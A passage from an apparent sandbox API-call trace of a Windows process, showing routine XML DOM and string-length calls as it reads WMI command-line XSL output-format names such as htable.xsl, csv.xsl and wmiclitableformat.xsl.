IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.763] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=3, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.763] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="rawxml.xsl") returned 0x0 [0302.763] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.763] malloc (_Size=0xc) returned 0x2f29958 [0302.763] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.763] free (_Block=0x2f29958) [0302.763] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0302.763] malloc (_Size=0xc) returned 0x2f298c8 [0302.763] malloc (_Size=0xc) returned 0x2f29928 [0302.763] SysStringLen (param_1="RAWXML") returned 0x6 [0302.763] SysStringLen (param_1="TABLE") returned 0x5 [0302.763] SysStringLen (param_1="RAWXML") returned 0x6 [0302.763] SysStringLen (param_1="LIST") returned 0x4 [0302.763] SysStringLen (param_1="LIST") returned 0x4 [0302.763] SysStringLen (param_1="RAWXML") returned 0x6 [0302.763] malloc (_Size=0x18) returned 0x2f22a08 [0302.764] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.764] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.764] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.764] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=4, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.764] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="htable.xsl") returned 0x0 [0302.764] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.764] malloc (_Size=0xc) returned 0x2f29970 [0302.764] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.764] free (_Block=0x2f29970) [0302.764] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0302.764] malloc (_Size=0xc) returned 0x2f298b0 [0302.764] malloc (_Size=0xc) returned 0x2f29850 [0302.764] SysStringLen (param_1="HTABLE") returned 0x6 [0302.764] SysStringLen (param_1="TABLE") returned 0x5 [0302.764] SysStringLen (param_1="HTABLE") returned 0x6 [0302.764] SysStringLen (param_1="LIST") returned 0x4 [0302.764] malloc (_Size=0x18) returned 0x2f22a48 [0302.764] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.764] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.765] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.765] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=5, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.765] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="hform.xsl") returned 0x0 [0302.765] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.765] malloc (_Size=0xc) returned 0x2f29940 [0302.765] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.765] free (_Block=0x2f29940) [0302.765] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0302.765] malloc (_Size=0xc) returned 0x2f29970 [0302.765] malloc (_Size=0xc) returned 0x2f29880 [0302.765] SysStringLen (param_1="HFORM") returned 0x5 [0302.765] SysStringLen (param_1="TABLE") returned 0x5 [0302.765] SysStringLen (param_1="HFORM") returned 0x5 [0302.765] SysStringLen (param_1="LIST") returned 0x4 [0302.765] SysStringLen (param_1="HFORM") returned 0x5 [0302.765] SysStringLen (param_1="HTABLE") returned 0x6 [0302.765] malloc (_Size=0x18) returned 0x2f22ba8 [0302.765] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.766] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.766] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.766] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=6, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.766] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="xml.xsl") returned 0x0 [0302.766] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.766] malloc (_Size=0xc) returned 0x2f29940 [0302.766] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.766] free (_Block=0x2f29940) [0302.766] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0302.766] malloc (_Size=0xc) returned 0x2f298e0 [0302.766] malloc (_Size=0xc) returned 0x2f29940 [0302.766] SysStringLen (param_1="XML") returned 0x3 [0302.766] SysStringLen (param_1="TABLE") returned 0x5 [0302.766] SysStringLen (param_1="XML") returned 0x3 [0302.766] SysStringLen (param_1="VALUE") returned 0x5 [0302.766] SysStringLen (param_1="VALUE") returned 0x5 [0302.766] SysStringLen (param_1="XML") returned 0x3 [0302.766] malloc (_Size=0x18) returned 0x2f22d48 [0302.766] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.767] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.767] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.767] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=7, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.767] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="mof.xsl") returned 0x0 [0302.767] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.767] malloc (_Size=0xc) returned 0x2f298f8 [0302.767] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.767] free (_Block=0x2f298f8) [0302.767] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0302.767] malloc (_Size=0xc) returned 0x2f298f8 [0302.767] malloc (_Size=0xc) returned 0x2f29958 [0302.767] SysStringLen (param_1="MOF") returned 0x3 [0302.767] SysStringLen (param_1="TABLE") returned 0x5 [0302.767] SysStringLen (param_1="MOF") returned 0x3 [0302.767] SysStringLen (param_1="LIST") returned 0x4 [0302.767] SysStringLen (param_1="MOF") returned 0x3 [0302.767] SysStringLen (param_1="RAWXML") returned 0x6 [0302.767] SysStringLen (param_1="LIST") returned 0x4 [0302.767] SysStringLen (param_1="MOF") returned 0x3 [0302.767] malloc (_Size=0x18) returned 0x2f22a88 [0302.768] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.768] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.768] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.768] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=8, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.768] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="csv.xsl") returned 0x0 [0302.768] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.768] malloc (_Size=0xc) returned 0x2f29988 [0302.768] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.768] free (_Block=0x2f29988) [0302.768] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0302.768] malloc (_Size=0xc) returned 0x2f29988 [0302.768] malloc (_Size=0xc) returned 0x2f299a0 [0302.768] SysStringLen (param_1="CSV") returned 0x3 [0302.768] SysStringLen (param_1="TABLE") returned 0x5 [0302.768] SysStringLen (param_1="CSV") returned 0x3 [0302.768] SysStringLen (param_1="LIST") returned 0x4 [0302.768] SysStringLen (param_1="CSV") returned 0x3 [0302.768] SysStringLen (param_1="HTABLE") returned 0x6 [0302.769] SysStringLen (param_1="CSV") returned 0x3 [0302.769] SysStringLen (param_1="HFORM") returned 0x5 [0302.769] malloc (_Size=0x18) returned 0x2f22bc8 [0302.769] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.769] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.769] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.769] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=9, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.769] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.769] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.769] malloc (_Size=0xc) returned 0x2f29820 [0302.769] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.769] free (_Block=0x2f29820) [0302.769] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0302.769] malloc (_Size=0xc) returned 0x2f29820 [0302.769] malloc (_Size=0xc) returned 0x2f2ae40 [0302.769] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.769] SysStringLen (param_1="TABLE") returned 0x5 [0302.769] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.770] SysStringLen (param_1="VALUE") returned 0x5 [0302.770] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.770] SysStringLen (param_1="XML") returned 0x3 [0302.770] SysStringLen (param_1="XML") returned 0x3 [0302.770] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.770] malloc (_Size=0x18) returned 0x2f22d88 [0302.770] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.770] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.770] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.770] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=10, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.770] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.770] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.770] malloc (_Size=0xc) returned 0x2f2aeb8 [0302.770] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.770] free (_Block=0x2f2aeb8) [0302.770] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0302.770] malloc (_Size=0xc) returned 0x2f2aea0 [0302.770] malloc (_Size=0xc) returned 0x2f2ae10 [0302.770] SysStringLen (param_1="texttablewsys") returned 0xd [0302.770] SysStringLen (param_1="TABLE") returned 0x5 [0302.771] SysStringLen (param_1="texttablewsys") returned 0xd [0302.771] SysStringLen (param_1="XML") returned 0x3 [0302.771] SysStringLen (param_1="texttablewsys") returned 0xd [0302.771] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.771] SysStringLen (param_1="XML") returned 0x3 [0302.771] SysStringLen (param_1="texttablewsys") returned 0xd [0302.771] malloc (_Size=0x18) returned 0x2f22be8 [0302.771] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.771] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.771] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.771] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=11, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.771] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.771] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.771] malloc (_Size=0xc) returned 0x2f2ae58 [0302.771] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.771] free (_Block=0x2f2ae58) [0302.771] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0302.771] malloc (_Size=0xc) returned 0x2f2ae88 [0302.771] malloc (_Size=0xc) returned 0x2f2ae58 [0302.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.772] SysStringLen (param_1="TABLE") returned 0x5 [0302.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.772] SysStringLen (param_1="XML") returned 0x3 [0302.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.772] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.772] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.772] malloc (_Size=0x18) returned 0x2f22c08 [0302.772] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.772] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.772] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.772] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=12, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.772] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.772] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.772] malloc (_Size=0xc) returned 0x2f2ae70 [0302.772] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.772] free (_Block=0x2f2ae70) [0302.772] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0302.772] malloc (_Size=0xc) returned 0x2f2aeb8 [0302.773] malloc (_Size=0xc) returned 0x2f2aed0 [0302.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.773] SysStringLen (param_1="TABLE") returned 0x5 [0302.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.773] SysStringLen (param_1="XML") returned 0x3 [0302.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.773] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.773] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.773] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.773] malloc (_Size=0x18) returned 0x2f22ce8 [0302.773] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.773] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.773] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.773] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=13, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.773] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.773] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.773] malloc (_Size=0xc) returned 0x2f2ae28 [0302.773] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.773] free (_Block=0x2f2ae28) [0302.831] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0302.831] malloc (_Size=0xc) returned 0x2f2ae28 [0302.831] malloc (_Size=0xc) returned 0x2f2ae70 [0302.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.831] SysStringLen (param_1="TABLE") returned 0x5 [0302.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.831] SysStringLen (param_1="XML") returned 0x3 [0302.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.831] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.831] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.831] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.831] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.831] malloc (_Size=0x18) returned 0x2f22aa8 [0302.831] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.831] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.831] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.831] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=14, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.832] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="texttable.xsl") returned 0x0 [0302.832] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.832] malloc (_Size=0xc) returned 0x2f2ad50 [0302.832] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.832] free (_Block=0x2f2ad50) [0302.832] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0302.832] malloc (_Size=0xc) returned 0x2f2abd0 [0302.832] malloc (_Size=0xc) returned 0x2f2ab88 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] SysStringLen (param_1="TABLE") returned 0x5 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] SysStringLen (param_1="XML") returned 0x3 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.832] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.832] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0302.832] malloc (_Size=0x18) returned 0x2f22ac8 [0302.833] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.833] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.833] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.833] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=15, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.833] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="htable.xsl") returned 0x0 [0302.833] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.833] malloc (_Size=0xc) returned 0x2f2abe8 [0302.833] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.833] free (_Block=0x2f2abe8) [0302.833] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0302.833] malloc (_Size=0xc) returned 0x2f2adf8 [0302.833] malloc (_Size=0xc) returned 0x2f2ab28 [0302.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.833] SysStringLen (param_1="TABLE") returned 0x5 [0302.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.833] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.833] SysStringLen (param_1="XML") returned 0x3 [0302.834] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.834] SysStringLen (param_1="texttablewsys") returned 0xd [0302.834] SysStringLen (param_1="XML") returned 0x3 [0302.834] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.834] malloc (_Size=0x18) returned 0x2f22b28 [0302.834] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.834] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.834] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.834] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=16, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.834] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="htable.xsl") returned 0x0 [0302.834] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.834] malloc (_Size=0xc) returned 0x2f2aca8 [0302.834] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.834] free (_Block=0x2f2aca8) [0302.834] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0302.834] malloc (_Size=0xc) returned 0x2f2ac60 [0302.834] malloc (_Size=0xc) returned 0x2f2ab70 [0302.834] SysStringLen (param_1="htable-sortby") returned 0xd [0302.834] SysStringLen (param_1="TABLE") returned 0x5 [0302.834] SysStringLen (param_1="htable-sortby") returned 0xd [0302.834] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.835] SysStringLen (param_1="htable-sortby") returned 0xd [0302.835] SysStringLen (param_1="XML") returned 0x3 [0302.835] SysStringLen (param_1="htable-sortby") returned 0xd [0302.835] SysStringLen (param_1="texttablewsys") returned 0xd [0302.835] SysStringLen (param_1="htable-sortby") returned 0xd [0302.835] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0302.835] SysStringLen (param_1="XML") returned 0x3 [0302.835] SysStringLen (param_1="htable-sortby") returned 0xd [0302.835] malloc (_Size=0x18) returned 0x2f22c28 [0302.835] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.835] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.835] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.835] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=17, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.835] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="mof.xsl") returned 0x0 [0302.835] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.835] malloc (_Size=0xc) returned 0x2f2ad08 [0302.835] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.835] free (_Block=0x2f2ad08) [0302.835] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0302.835] malloc (_Size=0xc) returned 0x2f2adc8 [0302.836] malloc (_Size=0xc) returned 0x2f2ab10 [0302.836] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.836] SysStringLen (param_1="TABLE") returned 0x5 [0302.836] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.836] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.836] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.836] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.836] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.836] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.836] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.836] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.836] malloc (_Size=0x18) returned 0x2f22d68 [0302.836] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.836] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.836] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.836] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=18, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.836] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="mof.xsl") returned 0x0 [0302.836] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.837] malloc (_Size=0xc) returned 0x2f2ac00 [0302.837] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.837] free (_Block=0x2f2ac00) [0302.837] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, 